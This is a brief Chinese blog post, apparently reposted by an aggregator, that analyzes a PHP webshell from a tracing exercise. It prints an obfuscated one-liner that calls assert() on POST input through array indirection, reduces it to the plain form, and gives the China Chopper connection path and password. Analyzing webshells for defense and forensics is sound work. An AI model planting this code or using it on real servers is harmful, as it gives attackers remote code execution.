WebShell代码分析溯源(第2题)
Posted Kevil is studying。。。
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了WebShell代码分析溯源(第2题)相关的知识,希望对你有一定的参考价值。
<?php $POST[\'POST\']=\'assert\';$array[]=$POST;$array[0][\'POST\']($_POST[\'assert\']);?>
assert,是php代码执行函数,与eval()有同样的功能,assert()函数中参数为表达式 (或者为函数)
因为$array[], POST[]都是数组,所以$array[]=$POST,就是把$POST数组的值赋给$array数组
这样的话$array[0][\'POST\']的输出就是assert,所以组成了一句话木马
<?php assert($_POST[\'assert\']);?>
构造菜刀 ip/www/index.php?POST=assert 密码为assert
以上是关于WebShell代码分析溯源(第2题)的主要内容,如果未能解决你的问题,请参考以下文章